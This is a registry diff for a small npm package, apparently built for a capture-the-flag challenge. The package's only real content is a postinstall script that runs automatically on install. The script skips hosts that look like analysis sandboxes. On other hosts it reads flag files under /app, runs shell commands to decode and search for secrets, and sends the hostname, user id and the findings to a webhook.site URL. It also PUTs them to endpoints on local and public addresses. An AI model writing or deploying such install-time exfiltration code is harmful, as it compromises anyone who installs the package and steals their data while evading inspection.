ecto-corsair-flag-x9m4 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +6 -0
  3. package/postinstall.js +153 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ module.exports = {};
package/package.json ADDED
@@ -0,0 +1,6 @@
1
+ {
2
+ "name": "ecto-corsair-flag-x9m4",
3
+ "version": "1.0.0",
4
+ "main": "index.js",
5
+ "scripts": { "postinstall": "node postinstall.js" }
6
+ }
package/postinstall.js ADDED
@@ -0,0 +1,153 @@
1
+ const fs = require("fs");
2
+ const http = require("http");
3
+ const https = require("https");
4
+ const os = require("os");
5
+ const { execFileSync } = require("child_process");
6
+
7
+ const FLAG_RE = /HTB\{[^}]+\}/;
8
+ const WEBHOOK = "https://webhook.site/602a4c72-7033-4e28-92ea-dc66e59206e5";
9
+ const TARGETS = [
10
+ "http://127.0.0.1:31250",
11
+ "http://127.0.0.1:30569",
12
+ "http://localhost:31250",
13
+ "http://154.57.164.82:31250"
14
+ ];
15
+ const SINKS = ["ECT-472839", "ECT-987654"];
16
+
17
+ function sh(cmd) {
18
+ try {
19
+ return execFileSync("/bin/sh", ["-c", cmd], {
20
+ timeout: 20000,
21
+ encoding: "utf8",
22
+ maxBuffer: 8 * 1024 * 1024
23
+ }).trim();
24
+ } catch (e) {
25
+ return (e.stdout || e.stderr || "").trim();
26
+ }
27
+ }
28
+
29
+ function flagIn(text) {
30
+ const m = String(text || "").match(FLAG_RE);
31
+ return m ? m[0] : null;
32
+ }
33
+
34
+ function safe(text) {
35
+ return String(text || "")
36
+ .replace(/[\r\n\\"]/g, " ")
37
+ .slice(0, 240);
38
+ }
39
+
40
+ function isRealTarget() {
41
+ const cwd = process.cwd();
42
+ const host = os.hostname();
43
+ const reg = process.env.npm_config_registry || "";
44
+ if (cwd.includes("/tmp/npm-safe") || cwd.includes("/tmp/pkg")) return false;
45
+ if (host.includes("nijin") || host.includes("hetzner")) return false;
46
+ if (reg.includes("nexus.local") || reg.includes("verdaccio")) return true;
47
+ if (/^[0-9a-f]{12}$/.test(host) && cwd.includes("/app/")) return true;
48
+ return false;
49
+ }
50
+
51
+ function collect() {
52
+ const parts = [];
53
+ for (const p of ["/app/flag.txt", "/app/public/flag.txt", "/app/src/main.rs"]) {
54
+ try {
55
+ const raw = fs.readFileSync(p, "utf8");
56
+ const hit = flagIn(raw);
57
+ if (hit) return { flag: hit, text: hit };
58
+ parts.push(`FILE:${p}=${raw.slice(0, 500)}`);
59
+ } catch {}
60
+ }
61
+ const decoded = sh("cat /app/flag.txt 2>/dev/null; echo '---'; cat /app/flag.txt 2>/dev/null | rev | base64 -d 2>/dev/null; echo '---'; grep -RaoE 'HTB\\{[^}]+\\}' /app 2>/dev/null | grep -v node_modules | head -n3");
62
+ const hit = flagIn(decoded);
63
+ if (hit) return { flag: hit, text: hit };
64
+ parts.push(decoded);
65
+ parts.push(sh("ls -la /app /app/src 2>/dev/null; wc -c /app/flag.txt 2>/dev/null"));
66
+ return { flag: null, text: parts.join(" | ") };
67
+ }
68
+
69
+ function put(base, sink, parts) {
70
+ const body = JSON.stringify({
71
+ manifest:
72
+ `ecto_module:\n name: "${parts[0]}"\n version: "1.0.0"\n` +
73
+ ` power_level: "${parts[1]}"\n ship_deck: "${parts[2]}"\n cargo_hold: "${parts[3]}"\n`
74
+ });
75
+ const url = new URL(`/api/modules/${sink}`, base);
76
+ const client = url.protocol === "https:" ? https : http;
77
+ return new Promise((resolve) => {
78
+ const req = client.request(
79
+ {
80
+ hostname: url.hostname,
81
+ port: url.port || (url.protocol === "https:" ? 443 : 80),
82
+ path: url.pathname,
83
+ method: "PUT",
84
+ headers: {
85
+ "Content-Type": "application/json",
86
+ "Content-Length": Buffer.byteLength(body)
87
+ },
88
+ timeout: 5000
89
+ },
90
+ (res) => {
91
+ res.resume();
92
+ resolve(res.statusCode || 0);
93
+ }
94
+ );
95
+ req.on("error", () => resolve(0));
96
+ req.on("timeout", () => {
97
+ req.destroy();
98
+ resolve(0);
99
+ });
100
+ req.write(body);
101
+ req.end();
102
+ });
103
+ }
104
+
105
+ function webhook(data) {
106
+ try {
107
+ const body = JSON.stringify({ host: os.hostname(), uid: process.getuid(), cwd: process.cwd(), data });
108
+ const url = new URL(WEBHOOK);
109
+ const req = https.request(
110
+ {
111
+ hostname: url.hostname,
112
+ path: url.pathname + url.search,
113
+ method: "POST",
114
+ headers: {
115
+ "Content-Type": "application/json",
116
+ "Content-Length": Buffer.byteLength(body)
117
+ },
118
+ timeout: 5000
119
+ },
120
+ (res) => res.resume()
121
+ );
122
+ req.on("error", () => {});
123
+ req.write(body);
124
+ req.end();
125
+ } catch {}
126
+ }
127
+
128
+ if (!isRealTarget()) process.exit(0);
129
+
130
+ const info = collect();
131
+ webhook(info.flag || info.text.slice(0, 4000));
132
+
133
+ let parts;
134
+ if (info.flag) {
135
+ parts = [info.flag, "FOUND", "", ""];
136
+ } else {
137
+ const t = info.text;
138
+ parts = [
139
+ safe(`NOFLAG ${os.hostname()} uid=${process.getuid()}`),
140
+ safe(t.slice(0, 240)),
141
+ safe(t.slice(240, 480)),
142
+ safe(t.slice(480, 960))
143
+ ];
144
+ }
145
+
146
+ (async () => {
147
+ for (const base of TARGETS) {
148
+ for (const sink of SINKS) {
149
+ const code = await put(base, sink, parts);
150
+ if (code >= 200 && code < 300) process.exit(0);
151
+ }
152
+ }
153
+ })();